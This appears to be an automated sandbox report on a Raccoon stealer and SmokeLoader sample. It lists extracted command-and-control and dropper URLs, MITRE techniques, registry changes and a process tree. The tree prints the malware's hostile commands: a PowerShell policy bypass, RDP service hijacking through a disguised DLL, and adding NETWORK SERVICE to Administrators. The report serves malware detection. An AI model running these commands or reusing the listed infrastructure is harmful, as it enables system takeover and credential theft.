raccoon | 22b13294437f3dc3266f4517bf126e7f3b84d96c05f299f41a59887f7710338c

Analysis

max time kernel
151s
max time network
157s
platform
windows10_x64
resource
win10-en-20210920
submitted
19-10-2021 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22c4ade2ee72ea363563416dbb0b28f0.exe
Size

259KB
MD5

22c4ade2ee72ea363563416dbb0b28f0
SHA1

b390af965c6917e886d62b882d1725d3a4ff39af
SHA256

22b13294437f3dc3266f4517bf126e7f3b84d96c05f299f41a59887f7710338c
SHA512

a7b2f134dad8cfe355c65bef6c9c22bab6d989f1eef1637ec6be71b51df705ee445139503cdf97f0b50076550e90336620a031c2925a11c642a18c34fd87d4f1

Score

10^/10

raccoon smokeloader 41060006b048ab05e30c36a645c3317ac285b336 backdoor discovery persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

41060006b048ab05e30c36a645c3317ac285b336

Attributes

url4cnc
http://telegatt.top/agre4fanfinal

http://telegka.top/agre4fanfinal

http://telegin.top/agre4fanfinal

https://t.me/agre4fanfinal

rc4.plain

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description	pid	Process	procid_target
PID 3792 created 3212	3792	WerFault.exe	81

suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	Process
74	2444	powershell.exe
76	2444	powershell.exe
77	2444	powershell.exe
78	2444	powershell.exe
80	2444	powershell.exe
82	2444	powershell.exe
84	2444	powershell.exe
86	2444	powershell.exe
88	2444	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

Processes:

70A8.exe971C.exeA527.exe

pid	Process
2052	70A8.exe
3212	971C.exe
3988	A527.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0002000000015295-393.dat	upx
behavioral2/files/0x00020000000152d8-394.dat	upx

Deletes itself 1 IoCs

Processes:

pid	Process
1588

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1304
1304

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE388.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_h5m1tjac.03k.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE328.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE399.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mahck2vc.f5k.psm1	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE377.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE3A9.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
3792	3212	WerFault.exe	81

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

22c4ade2ee72ea363563416dbb0b28f0.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	22c4ade2ee72ea363563416dbb0b28f0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	22c4ade2ee72ea363563416dbb0b28f0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	22c4ade2ee72ea363563416dbb0b28f0.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2056	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	80	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	76	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	77	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	78	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

22c4ade2ee72ea363563416dbb0b28f0.exe

pid	Process
2384	22c4ade2ee72ea363563416dbb0b28f0.exe
2384	22c4ade2ee72ea363563416dbb0b28f0.exe
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588
1588

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
1588

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
636
636

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

22c4ade2ee72ea363563416dbb0b28f0.exe

pid	Process
2384	22c4ade2ee72ea363563416dbb0b28f0.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeIncreaseQuotaPrivilege	3552	powershell.exe
Token: SeSecurityPrivilege	3552	powershell.exe
Token: SeTakeOwnershipPrivilege	3552	powershell.exe
Token: SeLoadDriverPrivilege	3552	powershell.exe
Token: SeSystemProfilePrivilege	3552	powershell.exe
Token: SeSystemtimePrivilege	3552	powershell.exe
Token: SeProfSingleProcessPrivilege	3552	powershell.exe
Token: SeIncBasePriorityPrivilege	3552	powershell.exe
Token: SeCreatePagefilePrivilege	3552	powershell.exe
Token: SeBackupPrivilege	3552	powershell.exe
Token: SeRestorePrivilege	3552	powershell.exe
Token: SeShutdownPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeSystemEnvironmentPrivilege	3552	powershell.exe
Token: SeRemoteShutdownPrivilege	3552	powershell.exe
Token: SeUndockPrivilege	3552	powershell.exe
Token: SeManageVolumePrivilege	3552	powershell.exe
Token: 33	3552	powershell.exe
Token: 34	3552	powershell.exe
Token: 35	3552	powershell.exe
Token: 36	3552	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeShutdownPrivilege	1588
Token: SeCreatePagefilePrivilege	1588
Token: SeIncreaseQuotaPrivilege	1644	powershell.exe
Token: SeSecurityPrivilege	1644	powershell.exe
Token: SeTakeOwnershipPrivilege	1644	powershell.exe
Token: SeLoadDriverPrivilege	1644	powershell.exe
Token: SeSystemProfilePrivilege	1644	powershell.exe
Token: SeSystemtimePrivilege	1644	powershell.exe
Token: SeProfSingleProcessPrivilege	1644	powershell.exe
Token: SeIncBasePriorityPrivilege	1644	powershell.exe
Token: SeCreatePagefilePrivilege	1644	powershell.exe
Token: SeBackupPrivilege	1644	powershell.exe
Token: SeRestorePrivilege	1644	powershell.exe
Token: SeShutdownPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeSystemEnvironmentPrivilege	1644	powershell.exe
Token: SeRemoteShutdownPrivilege	1644	powershell.exe
Token: SeUndockPrivilege	1644	powershell.exe
Token: SeManageVolumePrivilege	1644	powershell.exe
Token: 33	1644	powershell.exe
Token: 34	1644	powershell.exe
Token: 35	1644	powershell.exe
Token: 36	1644	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeIncreaseQuotaPrivilege	2196	powershell.exe
Token: SeSecurityPrivilege	2196	powershell.exe
Token: SeTakeOwnershipPrivilege	2196	powershell.exe
Token: SeLoadDriverPrivilege	2196	powershell.exe
Token: SeSystemProfilePrivilege	2196	powershell.exe
Token: SeSystemtimePrivilege	2196	powershell.exe
Token: SeProfSingleProcessPrivilege	2196	powershell.exe
Token: SeIncBasePriorityPrivilege	2196	powershell.exe
Token: SeCreatePagefilePrivilege	2196	powershell.exe
Token: SeBackupPrivilege	2196	powershell.exe
Token: SeRestorePrivilege	2196	powershell.exe
Token: SeShutdownPrivilege	2196	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid	Process
1588
1588

Suspicious use of SendNotifyMessage 5 IoCs

Processes:

pid	Process
1588
1588
1588
1588
1588

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

70A8.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 1588 wrote to memory of 2052	1588		73
PID 1588 wrote to memory of 2052	1588		73
PID 2052 wrote to memory of 1272	2052	70A8.exe	75
PID 2052 wrote to memory of 1272	2052	70A8.exe	75
PID 1272 wrote to memory of 1936	1272	powershell.exe	77
PID 1272 wrote to memory of 1936	1272	powershell.exe	77
PID 1936 wrote to memory of 2012	1936	csc.exe	78
PID 1936 wrote to memory of 2012	1936	csc.exe	78
PID 1272 wrote to memory of 3552	1272	powershell.exe	79
PID 1272 wrote to memory of 3552	1272	powershell.exe	79
PID 1588 wrote to memory of 3212	1588		81
PID 1588 wrote to memory of 3212	1588		81
PID 1588 wrote to memory of 3212	1588		81
PID 1272 wrote to memory of 1644	1272	powershell.exe	83
PID 1272 wrote to memory of 1644	1272	powershell.exe	83
PID 1588 wrote to memory of 3988	1588		85
PID 1588 wrote to memory of 3988	1588		85
PID 1588 wrote to memory of 3988	1588		85
PID 1272 wrote to memory of 2196	1272	powershell.exe	87
PID 1272 wrote to memory of 2196	1272	powershell.exe	87
PID 1272 wrote to memory of 3396	1272	powershell.exe	91
PID 1272 wrote to memory of 3396	1272	powershell.exe	91
PID 1272 wrote to memory of 2056	1272	powershell.exe	92
PID 1272 wrote to memory of 2056	1272	powershell.exe	92
PID 1272 wrote to memory of 2444	1272	powershell.exe	93
PID 1272 wrote to memory of 2444	1272	powershell.exe	93
PID 1272 wrote to memory of 3592	1272	powershell.exe	94
PID 1272 wrote to memory of 3592	1272	powershell.exe	94
PID 3592 wrote to memory of 3580	3592	net.exe	95
PID 3592 wrote to memory of 3580	3592	net.exe	95
PID 1272 wrote to memory of 4060	1272	powershell.exe	96
PID 1272 wrote to memory of 4060	1272	powershell.exe	96
PID 4060 wrote to memory of 3708	4060	cmd.exe	97
PID 4060 wrote to memory of 3708	4060	cmd.exe	97
PID 3708 wrote to memory of 1424	3708	cmd.exe	98
PID 3708 wrote to memory of 1424	3708	cmd.exe	98
PID 1424 wrote to memory of 2000	1424	net.exe	99
PID 1424 wrote to memory of 2000	1424	net.exe	99
PID 1272 wrote to memory of 2252	1272	powershell.exe	100
PID 1272 wrote to memory of 2252	1272	powershell.exe	100
PID 2252 wrote to memory of 3096	2252	cmd.exe	101
PID 2252 wrote to memory of 3096	2252	cmd.exe	101
PID 3096 wrote to memory of 3056	3096	cmd.exe	102
PID 3096 wrote to memory of 3056	3096	cmd.exe	102
PID 3056 wrote to memory of 3736	3056	net.exe	103
PID 3056 wrote to memory of 3736	3056	net.exe	103
PID 3500 wrote to memory of 668	3500	cmd.exe	107
PID 3500 wrote to memory of 668	3500	cmd.exe	107
PID 668 wrote to memory of 1072	668	net.exe	108
PID 668 wrote to memory of 1072	668	net.exe	108
PID 3848 wrote to memory of 2744	3848	cmd.exe	111
PID 3848 wrote to memory of 2744	3848	cmd.exe	111
PID 2744 wrote to memory of 3396	2744	net.exe	112
PID 2744 wrote to memory of 3396	2744	net.exe	112
PID 2056 wrote to memory of 1972	2056	cmd.exe	115
PID 2056 wrote to memory of 1972	2056	cmd.exe	115
PID 1972 wrote to memory of 2372	1972	net.exe	118
PID 1972 wrote to memory of 2372	1972	net.exe	118
PID 4056 wrote to memory of 844	4056	cmd.exe	119
PID 4056 wrote to memory of 844	4056	cmd.exe	119
PID 844 wrote to memory of 2328	844	net.exe	123
PID 844 wrote to memory of 2328	844	net.exe	123
PID 3600 wrote to memory of 3200	3600	cmd.exe	120
PID 3600 wrote to memory of 3200	3600	cmd.exe	120

C:\Users\Admin\AppData\Local\Temp\22c4ade2ee72ea363563416dbb0b28f0.exe
"C:\Users\Admin\AppData\Local\Temp\22c4ade2ee72ea363563416dbb0b28f0.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2384

C:\Users\Admin\AppData\Local\Temp\70A8.exe
C:\Users\Admin\AppData\Local\Temp\70A8.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i5lloxgb\i5lloxgb.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86DF.tmp" "c:\Users\Admin\AppData\Local\Temp\i5lloxgb\CSCDB210062FFC440A2A3D4A47A8F313F86.TMP"
      4⤵
      PID:2012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3396
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2056
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2444
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3580
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3708
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1424
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2000
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3096
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
